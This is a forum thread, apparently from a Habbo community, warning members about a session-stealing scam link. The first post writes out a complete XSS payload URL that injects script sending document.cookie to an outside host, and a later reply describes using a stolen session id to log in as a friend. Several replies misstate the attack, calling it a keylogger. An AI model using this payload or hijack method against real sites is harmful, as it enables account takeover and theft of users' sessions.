This is a recent scam, and I don't believe this has been posted, so I'm going to warn you all. There's a new scam based on Session Stealing.

If anybody asks you to go on a link similar to http://www.habbo.co.uk/credits/buy_credits/phone.html?habbo_id_1_length=%22%20/%3E%3Cscript%20language=%22JavaScript%22%3Edocumen t.location=%22http://h1.ripway.com/EXAMPLE/ getsesh.php?cookie=%22%20%2B%20document.cookie;%3C/script %3E%3Cz%20%22 (http://www.habbo.co.uk/credits/buy_credits/phone.html?habbo_id_1_length=%22%20/%3E%3Cscript%20language=%22JavaScript%22%3Edocumen t.location=%22http://h1.ripway.com/EXAMPLE/ getsesh.php?cookie=%22%20%2B%20document.cookie;%3C/script %3E%3Cz%20%22) DO NOT go on it, if you do you will be keylogged within a matter of minutes whether you change your password or not.


- Yux

Yeah I see, they're using 'ripway.com' it seems to embed the keylogger via cookies. Oh the sods, and thanks for the update. :)

i go and click it don't i lol shall i delete my cookies ?

i go and click it don't i lol shall i delete my cookies ?

No don't worry, I edited the link so it's harmless


- Yux

Thanks for that. nasty people :(

Thanks Yux!

You always keep us up-to-date with scams to be careful of!


Legend!!!

When you click a harmful link, they manage to steal your internet cookies.
This has your habbo Session from habbo home stolen, and they can use it.

Most of the time the session times out before they can do anything, but be careful!!

It's not a keylogger :S. They can only log into your account once then if you log out and log back in they can't get back on.. unless you click the link again.

It's fairly simple to avoid the scam you haven't been keylogged and if you do ever click the link then just log out of Habbo and log back in or if you wern't even on Habbo then you've nothing to worry about. So changing your password is useless because they can't get back on your account unless you click the link again..

At above poster.

It's embedded in the cookies, he edited the link so it's harmless.

Lol it aint a keylogger.. I tried it on a friend to show him it

U dont even get their pass, all tht happens is when they click the link you get their sessionid, then u put their sessionid in the url bar and refresh habbo and u will be logged in as them

its rubbish tho cos it only works if the person logged in less than 10 mins ago

Authenticated sessions:

Cookie on the habbo server, Cookie on the client.

When expires the server cookie is destroyed.

If you do manage to gain access to the cookie, there will be no way of replecating the login key with the server and the client id (traced by IP usually) will not match any existing sessions, causing a corruption of the server cookie.

You would not be able to do this, *unless* Habbo is cheap and do not use serverside authentication, if this is the case it violates Europian Legistlation- However habbo breaks the law everywhere :S


Lol

Interesting how they can use the Habbo.co.uk domain. Thanks for the tip :)